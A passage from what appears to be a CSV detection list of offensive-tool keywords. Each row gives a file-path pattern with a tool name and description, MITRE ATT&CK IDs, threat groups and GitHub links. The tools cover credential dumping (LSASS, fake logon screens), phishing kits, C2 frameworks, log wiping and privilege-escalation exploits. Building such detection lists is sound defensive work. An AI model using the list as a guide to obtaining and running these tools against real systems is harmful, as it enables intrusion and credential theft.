T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-JBoss.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/EvilLsassTwin/*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*/EvilnoVNC.git*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z" +"*/evilqr.git*","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","2","152","21","2023-07-05T13:24:44Z","2023-06-20T12:58:09Z" +"*/evilSignatures.db*","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*/EvilTwinServer*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" +"*/EvtMute.git*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*/Example_C2_Profile*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/Example_Payload_Type/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/ExcelDocWriter.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/exchanger.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*/exe_to_dll.git*","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*/exe2powershell*","offensive_tool_keyword","exe2powershell","exe2powershell is used to convert any binary file to a bat/powershell file","T1059.001 - T1027.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/yanncam/exe2powershell","1","1","N/A","6","2","153","44","2020-10-15T08:22:30Z","2016-03-02T11:23:32Z" +"*/exec_bin.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/exec_dll.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/exec_psexec*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/exec_psh.c*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/exec_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/exec0.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/Executable_Files.git*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/exegol_user_sources.list*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/exegol-docker-build/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/Exegol-history/*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/Exegol-images-*.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/Exegol-images.git*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/ExeStager/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"*/expl/expl.go*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","1","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" +"*/exploit.cron.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/exploit.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit.ldpreload.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/exploit.pbj*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/linux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/remote/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit/windows/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/exploit_orw.py*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","1","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"*/exploits/*.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/exports_function_hid.txt*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" +"*/ExternalC2/*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/ExternalC2/*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/ExtractBitlockerKeys.git*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*/f5_bigip_tmui_rce.rb*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jas502n/CVE-2020-5902","1","0","N/A","N/A","4","377","112","2021-10-13T07:53:46Z","2020-07-05T16:38:32Z" +"*/Fa1c0n35/zabbix-cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" +"*/fake.html","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/FakeCmdLine*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*/fakelogonscreen*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*/fake-sms.git*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*/Farmer.git*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" +"*/fastfuz-chrome-ext*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z" +"*/fb_firstlast.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/fb-brute.pl*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/febinrev/dirtypipez-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/febinrev/dirtypipez-exploit","1","1","N/A","N/A","1","41","21","2022-03-08T11:52:22Z","2022-03-08T11:49:40Z" +"*/fern-wifi-cracker/*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ffuf.git*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*/ffuf/ffufrc*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*/fiesta.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/fiesta2.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" 